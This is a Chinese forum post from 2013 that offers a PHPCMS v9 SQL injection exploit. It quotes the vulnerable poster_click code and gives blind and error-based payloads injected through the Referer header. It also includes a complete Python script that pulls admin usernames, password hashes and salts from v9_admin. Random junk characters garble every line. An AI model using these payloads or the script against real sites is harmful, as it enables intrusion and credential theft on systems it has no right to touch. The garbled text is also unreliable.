有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式: M6 r" U4 v( O1 s$ S- p' F
$ D! c7 e2 G; c Y/ J6 Y- {! c% o问题函数\phpcms\modules\poster\index.php f7 p8 a V$ R6 @4 `: D% ~9 C
9 u4 ~: g8 W3 @4 o* U: N% f, z [
public function poster_click() {
7 E5 r1 z S% i1 `3 |$id = isset($_GET['id']) ? intval($_GET['id']) : 0;9 W- V; }6 h! w3 H7 E& ^
$r = $this->db->get_one(array('id'=>$id));( \% c6 U* g- N! w' c ^* g
if (!is_array($r) && empty($r)) return false;
* A. `+ X( k# V% m+ y. q) T/ k7 ?$ip_area = pc_base::load_sys_class('ip_area');
' y; B: E( @+ c- L2 u$ip = ip(); m- V e b% _: G
$area = $ip_area->get($ip);
7 i _: n# [8 R) ^$username = param::get_cookie('username') ? param::get_cookie('username') : '';
c: U: O A) @& Q }if($id) {, e& C6 T( Q5 O8 r2 `% n1 i
$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
% r& E0 Z& [' V; f* w; h/ }, w$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));% U6 s+ |; S* g0 a( q* K& N" r
}
" H6 G, E6 l" F- r$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));1 G$ f; Y1 }$ V6 F0 C" }3 D
$setting = string2array($r['setting']);! m0 S3 z `7 Q' @/ O5 l+ c) G% o
if (count($setting)==1) {
V) V8 t' ~5 p$url = $setting['1']['linkurl'];
' ~. k w0 l; s7 J) ]6 }} else {
4 R2 K2 [. \9 A$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];
% a" x7 R0 n' _8 @9 q) Y! ^}( K( h% O0 c( O9 {
header('Location: '.$url);3 T2 h/ L: L& _$ T
}/ p' R) z3 x% Y6 h8 a2 M
+ o. t* V; _' A 2 `! j- E6 @: D* W( U
6 P) b3 P! C& p' v/ T- K6 I利用方式:
! f! N! j2 r q& s+ u* r4 K, y- w2 W A2 J* b
1、可以采用盲注入的手法:
; P, j9 I! x1 {: \2 e0 A" d; Q( r+ \3 _6 z+ Q. u3 @
referer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#: V7 z8 S9 C' Y8 H! P8 M
' V4 r( l, M' i- x4 M" G
通过返回页面,正常与否一个个猜解密码字段。
( e) T; L& w3 \, z* b) u
' z5 b( n" ]9 I8 i2、代码是花开写的,随手附上了:0 p6 v8 |- V& t2 \) l
5 |. ^% u3 e7 P$ b% o" s" L8 G1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#6 t. c% t- |' f1 v
+ v; f1 M) K( w1 o% U. d- B此方法是爆错注入手法,原理自查。
6 r# }) p8 H7 `; U0 c. ~) s* A5 D3 i; c0 Y
( K2 ~9 ~* |' T
0 l% A! x1 G. m5 _利用程序:2 x& B- X8 i0 |
& k: b) }5 ~' y#!/usr/bin/env python
& E/ L8 W9 b, r; R) K; Gimport httplib,sys,re" _" [. @) w( p) S. U- g. K
4 \! R* W. ^: U+ E
def attack():
& B" c! Z H; Z8 S, Cprint “Code by Pax.Mac Team conqu3r!”- S% h9 {- K. l- I# c4 o6 [+ r
print “Welcome to our zone!!!”
0 C! F+ o3 Y# J% T/ @4 ?' furl=sys.argv[1]& [% Y2 e5 N G& j1 t1 _
paths=sys.argv[2]( ?! _- X# X- K& C7 k5 d& s9 d
conn = httplib.HTTPConnection(url). v. J( D$ {: @- B- q" M: ]
i_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,
5 S7 [% X+ X& v0 ?5 l“Accept”: “text/plain”,
: a; {# z/ V3 n/ D2 b5 E! F; i* A“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}
" @ h* K+ R1 Y$ Qconn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)
9 ^: |! |! s: Y9 `$ E1 j( J1 Ir1 = conn.getresponse()
1 Y ]! [, f5 Y( d$ Vdatas=r1.read()
- \2 `+ x- v& X+ w3 [& `datas=re.findall(r”Duplicate entry \’\w+’”, datas), ^3 \: @' @% H9 Y3 O: b
print datas[0]
( ~2 Q: z" a5 H' K5 O2 ]9 hconn.close()) `+ D% O. e( n, h
if __name__==”__main__”:
' P( }/ q9 F4 e% o/ Y& xif len(sys.argv)<3:
4 p6 N7 v- J& Y( N$ ]print “Code by Pax.Mac Team conqu3r”2 L9 R: {9 F: }* `6 x/ y( a7 ?
print “Usgae:”* ?" y2 p; @' y2 a) u$ }4 G
print “ phpcmsattack.py www.paxmac.org /”
5 I2 H& w4 w0 f; F4 [) Xprint “ phpcmsataack.py www.paxmac.org /phpcmsv9/”
3 T4 q; L; S1 e$ K% p- }& ysys.exit(1)
; g% k+ i W" S4 M$ J8 kattack() b+ z, _9 ?, q! _- Z
* a( J- j4 g+ J9 o% l |
发表于 2013-1-11 21:01:00
收藏
支持
反对